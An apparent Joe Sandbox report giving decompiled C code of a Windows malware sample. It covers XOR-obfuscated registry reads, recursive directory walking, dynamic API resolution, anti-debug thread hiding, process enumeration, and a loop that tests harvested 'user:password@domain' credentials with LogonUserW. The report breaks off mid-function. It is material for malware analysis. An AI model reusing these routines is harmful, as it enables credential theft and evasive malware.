                control_flow_graph 615 10f9f23-10f9f4e call 10f6393 618 10f9f55-10f9fc5 call 10f16b4 615->618 619 10f9f50 615->619 625 10f9fca-10f9fd4 618->625 620 10fa0fa-10fa0fe 619->620 622 10fa109-10fa10f 620->622 623 10fa100-10fa103 NtClose 620->623 623->622 625->625 626 10f9fd6-10fa011 RegCreateKeyExW 625->626 628 10fa018-10fa044 626->628 629 10fa013 626->629 630 10fa049-10fa053 628->630 629->620 630->630 631 10fa055-10fa080 RegQueryValueExW 630->631 632 10fa0d9-10fa0e8 call 10f5f98 631->632 633 10fa082-10fa0a7 631->633 632->620 638 10fa0ea-10fa0f7 632->638 634 10fa0ac-10fa0b6 633->634 634->634 636 10fa0b8-10fa0d5 634->636 636->632 641 10fa0d7 636->641 638->620 641->620
                C-Code - Quality: 48%
                			E010F9F23() {
                				int* _v8;
                				void* _v12;
                				int _v16;
                				int _v20;
                				char _v36;
                				short _v92;
                				short _v612;
                				void* _t55;
                				signed int* _t58;
                				long _t64;
                				signed int* _t65;
                				long _t70;
                				signed int* _t76;
                				void* _t82;
                				void* _t83;
                				void* _t84;
                
                				_v8 = 0;
                				_v12 = 0;
                				_t55 = E010F6393( *0x1100fe8,  &_v612); // executed
                				if(_t55 != 0) {
                					E010F16B4( &_v612);
                					_t58 =  &_v92;
                					 *_t58 = 0x22695fae;
                					_t58[1] = 0x22725f83;
                					_t58[2] = 0x22695f9f;
                					_t58[3] = 0x22265f81;
                					_t58[4] = 0x22675fbd;
                					_t58[5] = 0x22635f83;
                					_t58[6] = 0x225a5f81;
                					_t58[7] = 0x22685fa4;
                					_t58[8] = 0x22635f99;
                					_t58[9] = 0x22685f9f;
                					_t58[0xa] = 0x22725f8c;
                					_t58[0xb] = 0x22695f84;
                					_t58[0xc] = 0x22675f83;
                					_t58[0xd] = 0x22065f81;
                					_t82 = 0xe;
                					do {
                						 *_t58 =  *_t58 ^ 0x22065fed;
                						_t58 =  &(_t58[1]);
                						_t82 = _t82 - 1;
                					} while (_t82 != 0);
                					 *0x11012d8( &_v612,  &_v92);
                					_t64 = RegCreateKeyExW(0x80000003,  &_v612, 0, 0, 0, 0x20119, 0,  &_v12, 0); // executed
                					if(_t64 == 0) {
                						_t65 =  &_v92;
                						 *_t65 = 0x22695fa1;
                						_t65[1] = 0x22675f8e;
                						_t65[2] = 0x22635f81;
                						_t65[3] = 0x22675fa3;
                						_t65[4] = 0x22635f80;
                						_t65[5] = 0x22065fed;
                						_t83 = 6;
                						do {
                							 *_t65 =  *_t65 ^ 0x22065fed;
                							_t65 =  &(_t65[1]);
                							_t83 = _t83 - 1;
                						} while (_t83 != 0);
                						_v16 = 1;
                						_v20 = 0x10;
                						_t70 = RegQueryValueExW(_v12,  &_v92, 0,  &_v16,  &_v36,  &_v20); // executed
                						if(_t70 == 0) {
                							L13:
                							_v8 = E010F5F98(_v20);
                							if(_v8 != 0) {
                								 *0x11012dc(_v8,  &_v36);
                							}
                							L15:
                							if(_v12 != 0) {
                								NtClose(_v12); // executed
                							}
                							return _v8;
                						}
                						_t76 =  &_v92;
                						 *_t76 = 0x224a5f9e;
                						_t76[1] = 0x22685f8c;
                						_t76[2] = 0x22735f8a;
                						_t76[3] = 0x22615f8c;
                						_t76[4] = 0x22065f88;
                						_t84 = 5;
                						do {
                							 *_t76 =  *_t76 ^ 0x22065fed;
                							_t76 =  &(_t76[1]);
                							_t84 = _t84 - 1;
                						} while (_t84 != 0);
                						_push( &_v20);
                						_push( &_v36);
                						_push( &_v16);
                						_push(0);
                						_push( &_v92);
                						_push(_v12);
                						if( *0x1101444() == 0) {
                							goto L13;
                						}
                						goto L15;
                					}
                					goto L15;
                				}
                				goto L15;
                			}



















                0x010f9f2c
                0x010f9f33
                0x010f9f47
                0x010f9f4e
                0x010f9f5c
                0x010f9f61
                0x010f9f64
                0x010f9f6a
                0x010f9f71
                0x010f9f78
                0x010f9f7f
                0x010f9f86
                0x010f9f8d
                0x010f9f94
                0x010f9f9b
                0x010f9fa2
                0x010f9fa9
                0x010f9fb0
                0x010f9fb7
                0x010f9fbe
                0x010f9fc5
                0x010f9fca
                0x010f9fca
                0x010f9fd0
                0x010f9fd3
                0x010f9fd3
                0x010f9fe1
                0x010fa009
                0x010fa011
                0x010fa018
                0x010fa01b
                0x010fa021
                0x010fa028
                0x010fa02f
                0x010fa036
                0x010fa03d
                0x010fa044
                0x010fa049
                0x010fa049
                0x010fa04f
                0x010fa052
                0x010fa052
                0x010fa055
                0x010fa05c
                0x010fa078
                0x010fa080
                0x010fa0d9
                0x010fa0e1
                0x010fa0e8
                0x010fa0f1
                0x010fa0f7
                0x010fa0fa
                0x010fa0fe
                0x010fa103
                0x010fa103
                0x010fa10f
                0x010fa10f
                0x010fa082
                0x010fa085
                0x010fa08b
                0x010fa092
                0x010fa099
                0x010fa0a0
                0x010fa0a7
                0x010fa0ac
                0x010fa0ac
                0x010fa0b2
                0x010fa0b5
                0x010fa0b5
                0x010fa0bb
                0x010fa0bf
                0x010fa0c3
                0x010fa0c4
                0x010fa0c9
                0x010fa0ca
                0x010fa0d5
                0x00000000
                0x00000000
                0x00000000
                0x010fa0d7
                0x00000000
                0x010fa013
                0x00000000

                APIs
                • RegCreateKeyExW.KERNEL32(80000003,?,00000000,00000000,00000000,00020119,00000000,00000000,00000000), ref: 010FA009
                • NtClose.NTDLL(00000000,00000010), ref: 010FA103
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: CloseCreate
                • String ID:
                • API String ID: 2932200918-0
                • Opcode ID: cb96b5c990d1d5fcb7cd8db9a5f48a013b50db5f94ac1c51eaf2fff14f6c3646
                • Instruction ID: cc7d9e8c46097f2c3d5055b775171c081405e68b62f39f9d0457170ad311d58b
                • Opcode Fuzzy Hash: cb96b5c990d1d5fcb7cd8db9a5f48a013b50db5f94ac1c51eaf2fff14f6c3646
                • Instruction Fuzzy Hash: 4451D7B2910308EFDB19CF91DA85FADBBB8FB04300F0542E9E605AB2A1D7749644DF91
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 691 10f6245-10f62c7 692 10f62cc-10f62d6 691->692 692->692 693 10f62d8-10f6304 692->693 694 10f6309-10f6313 693->694 694->694 695 10f6315-10f6339 RegCreateKeyExW 694->695 696 10f633b-10f6369 RegQueryValueExW 695->696 697 10f638a-10f6390 695->697 698 10f636b-10f637e 696->698 699 10f6381-10f6384 NtClose 696->699 698->699 699->697
                C-Code - Quality: 68%
                			E010F6245(intOrPtr _a4) {
                				void* _v8;
                				int _v12;
                				int _v16;
                				short _v40;
                				short _v104;
                				char _v232;
                				signed int* _t38;
                				signed int* _t39;
                				long _t42;
                				long _t48;
                				void* _t52;
                				void* _t53;
                
                				_v16 = 0;
                				_t38 =  &_v104;
                				 *_t38 = 0x22495fbe;
                				_t38[1] = 0x22525fab;
                				_t38[2] = 0x22475fba;
                				_t38[3] = 0x22435fbf;
                				_t38[4] = 0x224b5fb1;
                				_t38[5] = 0x22655f84;
                				_t38[6] = 0x22695f9f;
                				_t38[7] = 0x22695f9e;
                				_t38[8] = 0x22725f8b;
                				_t38[9] = 0x22455fb1;
                				_t38[0xa] = 0x227f5f9f;
                				_t38[0xb] = 0x22725f9d;
                				_t38[0xc] = 0x22615f82;
                				_t38[0xd] = 0x22675f9f;
                				_t38[0xe] = 0x226e5f9d;
                				_t38[0xf] = 0x22065f94;
                				_t52 = 0x10;
                				do {
                					 *_t38 =  *_t38 ^ 0x22065fed;
                					_t38 =  &(_t38[1]);
                					_t52 = _t52 - 1;
                				} while (_t52 != 0);
                				_t39 =  &_v40;
                				 *_t39 = 0x22675fa0;
                				_t39[1] = 0x226e5f8e;
                				_t39[2] = 0x22685f84;
                				_t39[3] = 0x22415f88;
                				_t39[4] = 0x226f5f98;
                				_t39[5] = 0x22065f89;
                				_t53 = 6;
                				do {
                					 *_t39 =  *_t39 ^ 0x22065fed;
                					_t39 =  &(_t39[1]);
                					_t53 = _t53 - 1;
                				} while (_t53 != 0);
                				_t42 = RegCreateKeyExW(0x80000002,  &_v104, 0, 0, 0, 0x20119, 0,  &_v8, 0); // executed
                				if(_t42 == 0) {
                					_v12 = 1;
                					_v16 = 0x80;
                					_t48 = RegQueryValueExW(_v8,  &_v40, 0,  &_v12,  &_v232,  &_v16); // executed
                					if(_t48 == 0) {
                						 *0x11012bc(_a4,  &_v232, _v16);
                					}
                					NtClose(_v8); // executed
                				}
                				return _v16;
                			}















                0x010f624e
                0x010f6255
                0x010f6258
                0x010f625e
                0x010f6265
                0x010f626c
                0x010f6273
                0x010f627a
                0x010f6281
                0x010f6288
                0x010f628f
                0x010f6296
                0x010f629d
                0x010f62a4
                0x010f62ab
                0x010f62b2
                0x010f62b9
                0x010f62c0
                0x010f62c7
                0x010f62cc
                0x010f62cc
                0x010f62d2
                0x010f62d5
                0x010f62d5
                0x010f62d8
                0x010f62db
                0x010f62e1
                0x010f62e8
                0x010f62ef
                0x010f62f6
                0x010f62fd
                0x010f6304
                0x010f6309
                0x010f6309
                0x010f630f
                0x010f6312
                0x010f6312
                0x010f6331
                0x010f6339
                0x010f633b
                0x010f6342
                0x010f6361
                0x010f6369
                0x010f6378
                0x010f637e
                0x010f6384
                0x010f6384
                0x010f6390

                APIs
                • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,00020119,00000000,?,00000000), ref: 010F6331
                • RegQueryValueExW.KERNEL32(?,?,00000000,00000001,?,00000080), ref: 010F6361
                • NtClose.NTDLL(?), ref: 010F6384
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: CloseCreateQueryValue
                • String ID:
                • API String ID: 4083198587-0
                • Opcode ID: 1b21e1612b81b8d49bc52ce5b11704b9c7e5a5bf8e1e89ddfdbdd6588b6b2d72
                • Instruction ID: 192728d0be5e308d3bad685d6a20c719ad5b031d54861350a28c75820a4a5d89
                • Opcode Fuzzy Hash: 1b21e1612b81b8d49bc52ce5b11704b9c7e5a5bf8e1e89ddfdbdd6588b6b2d72
                • Instruction Fuzzy Hash: DC31F4B1801308AFDB19CF41CB85B99BBB8EB04304F1282D9E605AF2A2D770DA04CF91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 44%
                			E010F6A11(intOrPtr _a4) {
                				void* _v8;
                				char _v12;
                				short _v532;
                				struct _WIN32_FIND_DATAW _v1124;
                				void* _t22;
                				intOrPtr* _t25;
                				int _t32;
                				void* _t35;
                				void* _t41;
                				void* _t42;
                
                				_t22 = E010F6AE4(_a4,  &_v532); // executed
                				if(_t22 != 0) {
                					E010F16B4( &_v532);
                					_t25 =  &_v12;
                					 *_t25 = 0x2d0053;
                					 *((intOrPtr*)(_t25 + 4)) = 0x2a;
                					 *0x11012d8( &_v532, _t25);
                					_t42 = _t41 + 8;
                					_t22 = FindFirstFileExW( &_v532, 0,  &_v1124, 0, 0, 0); // executed
                					_v8 = _t22;
                					if(_v8 != 0xffffffff) {
                						do {
                							if((_v1124.dwFileAttributes & 0x00000010) != 0) {
                								_t35 =  *0x11012e8( &_v532, 0x5c);
                								 *0x11012dc(_t35 + 2,  &(_v1124.cFileName));
                								_t42 = _t42 + 0x10;
                								E010F6BBF( &_v532); // executed
                							}
                							_t32 = FindNextFileW(_v8,  &_v1124); // executed
                						} while (_t32 != 0);
                						return  *0x110137c(_v8);
                					}
                				}
                				return _t22;
                			}













                0x010f6a24
                0x010f6a2b
                0x010f6a38
                0x010f6a3d
                0x010f6a40
                0x010f6a46
                0x010f6a55
                0x010f6a5b
                0x010f6a74
                0x010f6a7a
                0x010f6a81
                0x010f6a83
                0x010f6a8d
                0x010f6a98
                0x010f6aac
                0x010f6ab2
                0x010f6abc
                0x010f6abc
                0x010f6acb
                0x010f6ad1
                0x00000000
                0x010f6ad8
                0x010f6a81
                0x010f6ae1

                APIs
                  • Part of subcall function 010F6AE4: FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 010F6B53
                  • Part of subcall function 010F6AE4: FindClose.KERNEL32(000000FF), ref: 010F6BB0
                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 010F6A74
                • FindNextFileW.KERNEL32(000000FF,?), ref: 010F6ACB
                  • Part of subcall function 010F6BBF: FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 010F6C46
                  • Part of subcall function 010F6BBF: GetFileAttributesW.KERNEL32(00000000), ref: 010F6CD9
                  • Part of subcall function 010F6BBF: FindNextFileW.KERNELBASE(000000FF,?), ref: 010F6D43
                  • Part of subcall function 010F6BBF: FindClose.KERNELBASE(000000FF), ref: 010F6D54
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Find$File$First$CloseNext$Attributes
                • String ID:
                • API String ID: 1082676904-0
                • Opcode ID: f6b23ac1d90c546e9802fa5f726d60da8a690e931d7e1d36bfc06940d4c483e8
                • Instruction ID: be4873805ac88e7019a678bc79652341a0d412d5fd7e9c2cec7a41e66a8ce077
                • Opcode Fuzzy Hash: f6b23ac1d90c546e9802fa5f726d60da8a690e931d7e1d36bfc06940d4c483e8
                • Instruction Fuzzy Hash: 3A214AB194020CABDB21DBA0DC49FEAB7BCBB14301F0445E9A614E6590E7B59B988F51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 010F6B53
                • FindClose.KERNEL32(000000FF), ref: 010F6BB0
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                • Opcode ID: 04743ae9d3e157eba1ad61010c7224360864cd62e3d3510cbf031049f82bb898
                • Instruction ID: d5a3f964fcbe08fdd1c82b66aece65fc867cb190c93a68d59682439fd5171bd4
                • Opcode Fuzzy Hash: 04743ae9d3e157eba1ad61010c7224360864cd62e3d3510cbf031049f82bb898
                • Instruction Fuzzy Hash: B7212CB0800208FFDB219F94DD09B98BBB8FB04305F1081A5EA58AA161D7769A98CF54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 33%
                			E010F57A7(short* _a4) {
                				_Unknown_base(*)()* _v8;
                				char _v268;
                				struct HINSTANCE__* _t10;
                				_Unknown_base(*)()* _t11;
                				CHAR* _t12;
                				CHAR* _t13;
                				short* _t14;
                
                				_v8 = 0;
                				_t14 = _a4;
                				_t13 =  &_v268;
                				while( *_t14 != 0) {
                					asm("lodsb");
                					if(0 != 0) {
                						if(0 != 0x2e) {
                							asm("stosb");
                						} else {
                							asm("stosb");
                							_t12 = _t13;
                						}
                						continue;
                					} else {
                						asm("stosb");
                						break;
                					}
                				}
                				if( *0x1101214 != 0) {
                					_t10 = LoadLibraryA( &_v268); // executed
                					if(_t10 != 0 &&  *0x1101218 != 0) {
                						_t11 = GetProcAddress(_t10, _t12);
                						if(_t11 != 0) {
                							_v8 = _t11;
                						}
                					}
                				}
                				return _v8;
                			}










                0x010f57b3
                0x010f57ba
                0x010f57bd
                0x010f57d9
                0x010f57c5
                0x010f57c8
                0x010f57cf
                0x010f57d8
                0x010f57d1
                0x010f57d3
                0x010f57d4
                0x010f57d4
                0x00000000
                0x010f57ca
                0x010f57ca
                0x00000000
                0x010f57ca
                0x010f57c8
                0x010f57e6
                0x010f57ef
                0x010f57f7
                0x010f5804
                0x010f580c
                0x010f580e
                0x010f580e
                0x010f580c
                0x010f57f7
                0x010f581a

                APIs
                • LoadLibraryA.KERNEL32(?,?,?,?), ref: 010F57EF
                • GetProcAddress.KERNEL32(00000000,?), ref: 010F5804
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID:
                • API String ID: 2574300362-0
                • Opcode ID: f0fcf921806a3dfd39b894bed20b7ec33c02911086bb91ce3407faa42940979a
                • Instruction ID: 124efda0345ecf8e047b170945690f369ba43f77875af918302b483f518db9f4
                • Opcode Fuzzy Hash: f0fcf921806a3dfd39b894bed20b7ec33c02911086bb91ce3407faa42940979a
                • Instruction Fuzzy Hash: DB018F74900308EAEF61CA58EC497E97BF8FB14341F2040AD97C4A3840D7B499C68BA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E010FB790() {
                				struct _SECURITY_ATTRIBUTES* _v8;
                				void* _t13;
                				void* _t19;
                				void* _t20;
                
                				_t18 =  >  ? 0x20 :  *((intOrPtr*)( *[fs:0x30] + 0x64));
                				_t19 = 1 + ( >  ? 0x20 :  *((intOrPtr*)( *[fs:0x30] + 0x64))) * 2;
                				_v8 = 0;
                				 *0x11015e0 =  *0x11013b4(0xffffffff, 0, 0, _t19);
                				if( *0x11015e0 != 0) {
                					do {
                						_t13 = CreateThread(0, 0, E010FB497, 0, 0, 0); // executed
                						_t20 = _t13;
                						if(_t20 != 0) {
                							E010F92E1(_t20); // executed
                							NtClose(_t20); // executed
                							_v8 =  &(_v8->nLength);
                						}
                						_t19 = _t19 - 1;
                					} while (_t19 != 0);
                				}
                				return _v8;
                			}







                0x010fb7a9
                0x010fb7ac
                0x010fb7b3
                0x010fb7c7
                0x010fb7d3
                0x010fb7d5
                0x010fb7e4
                0x010fb7ea
                0x010fb7ee
                0x010fb7f1
                0x010fb7f7
                0x010fb7fd
                0x010fb7fd
                0x010fb800
                0x010fb801
                0x010fb7d5
                0x010fb80d

                APIs
                • CreateThread.KERNEL32(00000000,00000000,010FB497,00000000,00000000,00000000,?,00000000), ref: 010FB7E4
                  • Part of subcall function 010F92E1: NtSetInformationThread.NTDLL(00000000,?,00000000,00000000,?,010FE8E1,00000000), ref: 010F9302
                • NtClose.NTDLL(00000000,00000000,?,00000000), ref: 010FB7F7
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Thread$CloseCreateInformation
                • String ID:
                • API String ID: 3895992022-0
                • Opcode ID: 3e67618e346743fe1aed6c359496706e641cb1abad8b99dbc82ffd9e4ebedb2d
                • Instruction ID: 0e925ae8d18fe6cd65e39656e7105d5b97054c8482f2b774f367a4bd6a27b18f
                • Opcode Fuzzy Hash: 3e67618e346743fe1aed6c359496706e641cb1abad8b99dbc82ffd9e4ebedb2d
                • Instruction Fuzzy Hash: E401DB30B44714FBE335AB54DCC6B9977A4EB04BA0F200274FB11AA6C1E7F499448654
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F9554(void* __eflags) {
                				void* _t1;
                				void* _t7;
                
                				_t1 = E010F5FEC(4);
                				_t7 = _t1;
                				if(_t7 != 0) {
                					 *_t7 = 3;
                					NtSetInformationProcess(0xffffffff, 0x21, _t7, 4); // executed
                					 *_t7 =  *_t7 << 9;
                					NtSetInformationProcess(0xffffffff, 0x12, _t7, 2); // executed
                					return E010F6022(_t7);
                				}
                				return _t1;
                			}





                0x010f9557
                0x010f955c
                0x010f9560
                0x010f9562
                0x010f9571
                0x010f9577
                0x010f9583
                0x00000000
                0x010f958a
                0x010f9590

                APIs
                • NtSetInformationProcess.NTDLL(000000FF,00000021,00000000,00000004,00000004,00000000,010FE72B,00000000), ref: 010F9571
                • NtSetInformationProcess.NTDLL(000000FF,00000012,00000000,00000002), ref: 010F9583
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: InformationProcess
                • String ID:
                • API String ID: 1801817001-0
                • Opcode ID: 39a6ca853832ac02d7088e1f90921be91ff645f3aa5e4506b39dd76c8ef46702
                • Instruction ID: d441d62bde467a24b4327b66a14af29802275c9907538d0610fbac61cb56306f
                • Opcode Fuzzy Hash: 39a6ca853832ac02d7088e1f90921be91ff645f3aa5e4506b39dd76c8ef46702
                • Instruction Fuzzy Hash: F3E0B6B12442167BEB22ABD89DCAFA537AC9B19B20F1003A4B7319D4D5D7A4C9448762
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E010F85C8(void* __eflags) {
                				void* _v8;
                				short _v264;
                				short* _t33;
                				signed int _t34;
                				int _t39;
                				signed int _t41;
                				short* _t55;
                				short* _t56;
                				short* _t62;
                				void* _t63;
                				void* _t65;
                
                				_v8 = 0;
                				_t2 = E010F14F2( *0x1100fd0) + 2; // 0x2
                				_t62 = E010F5F98(_t2);
                				_t71 = _t62;
                				if(_t62 != 0) {
                					E010F12CE( *0x1100fd0, _t62);
                					E010F5FB3( *0x1100fd0);
                					E010F1713(_t71, _t62, _t58);
                					 *0x1100fd0 = _t62;
                					while(1) {
                						 *0x11012dc( &_v264, _t62);
                						_t33 =  *0x11012e4( &_v264, 0x3a);
                						_t65 = _t63 + 0x10;
                						_t55 = _t33;
                						if(_t55 == 0) {
                							goto L5;
                						}
                						 *_t55 = 0;
                						_t6 = _t55 + 2; // 0x2
                						_t39 = LogonUserW( &_v264, 0, _t6, 4, 0,  &_v8); // executed
                						if(_t39 == 0) {
                							goto L5;
                						} else {
                							_t8 = _t55 + 2; // 0x2
                							_t41 =  *0x11012d4(_t8);
                							_t11 = _t55 + 2; // 0x2
                							 *0x1100fe0 = E010F64FA(_t11, 2 + _t41 * 2);
                							_t56 =  *0x11012e4( &_v264, 0x40);
                							 *_t56 = 0;
                							 *0x1100fd8 = E010F64FA( &_v264, 2 +  *0x11012d4( &_v264) * 2);
                							 *0x1100fdc = E010F64FA(_t56 + 2, 2 +  *0x11012d4(_t56 + 2) * 2);
                						}
                						L8:
                						E010F5FB3( *0x1100fd0);
                						goto L9;
                						L5:
                						_t34 =  *0x11012d4(_t62);
                						_t63 = _t65 + 4;
                						_t62 = _t62 + 2 + _t34 * 2;
                						__eflags =  *_t62;
                						if( *_t62 != 0) {
                							continue;
                						} else {
                						}
                						goto L8;
                					}
                				}
                				L9:
                				return _v8;
                			}














                0x010f85d4
                0x010f85e8
                0x010f85f1
                0x010f85f3
                0x010f85f5
                0x010f8602
                0x010f860d
                0x010f8614
                0x010f8619
                0x010f861f
                0x010f8627
                0x010f8639
                0x010f863f
                0x010f8642
                0x010f8646
                0x00000000
                0x00000000
                0x010f864c
                0x010f8659
                0x010f8666
                0x010f866e
                0x00000000
                0x010f8674
                0x010f8674
                0x010f8678
                0x010f868b
                0x010f8694
                0x010f86ab
                0x010f86ad
                0x010f86db
                0x010f86fa
                0x010f86fa
                0x010f871c
                0x010f8722
                0x00000000
                0x010f8701
                0x010f8702
                0x010f8708
                0x010f870b
                0x010f870f
                0x010f8713
                0x00000000
                0x00000000
                0x010f8715
                0x00000000
                0x010f8713
                0x010f861f
                0x010f8727
                0x010f8730

                APIs
                  • Part of subcall function 010F5F98: RtlAllocateHeap.NTDLL(?,00000008,?,?,010F6457,00000014,?), ref: 010F5FA9
                  • Part of subcall function 010F5FB3: RtlFreeHeap.NTDLL(?,00000000,?,?,010F7F03,?), ref: 010F5FC4
                • LogonUserW.ADVAPI32(?,00000000,00000002,00000004,00000000,00000000), ref: 010F8666
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Heap$AllocateFreeLogonUser
                • String ID:
                • API String ID: 2986075563-0
                • Opcode ID: 1d2fff0315cf6965e187d12c1ae621fcbe3a69ec2d1ad193beca1c542193b497
                • Instruction ID: 7672c915c03ff52874215b940817f9d40fa66adfaf35206ad81673b6277fc19b
                • Opcode Fuzzy Hash: 1d2fff0315cf6965e187d12c1ae621fcbe3a69ec2d1ad193beca1c542193b497
                • Instruction Fuzzy Hash: 713191B1C00205ABDB21ABA4DC8AFCA77ADEB44340F00007AE755D7505EBB4D694CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 44%
                			E010F73C1() {
                				char _v8;
                				long _v12;
                				void* _v16;
                				intOrPtr _v20;
                				char _v24;
                				char _v48;
                				long _t32;
                				void* _t34;
                				intOrPtr* _t44;
                				intOrPtr* _t45;
                				intOrPtr _t46;
                
                				_v12 = 0x400;
                				_v16 = E010F5F98(_v12);
                				while(1) {
                					_t32 = NtQuerySystemInformation(5, _v16, _v12,  &_v12); // executed
                					if(_t32 == 0) {
                						break;
                					}
                					if(_t32 != 0xc0000004) {
                						return E010F5FB3(_v16);
                					} else {
                						_t34 = E010F5FCE(_v16, _v12); // executed
                						_v16 = _t34;
                						continue;
                					}
                					L13:
                				}
                				_t44 = _v16;
                				do {
                					_t46 =  *_t44;
                					if( *((intOrPtr*)(_t44 + 0x3c)) != 0 && E010F74AF( *((intOrPtr*)(_t44 + 0x3c))) != 0) {
                						_v24 =  *((intOrPtr*)(_t44 + 0x44));
                						_v20 = 0;
                						_t45 =  &_v48;
                						 *_t45 = 0x18;
                						 *((intOrPtr*)(_t45 + 4)) = 0;
                						 *((intOrPtr*)(_t45 + 8)) = 0;
                						 *((intOrPtr*)(_t45 + 0xc)) = 0;
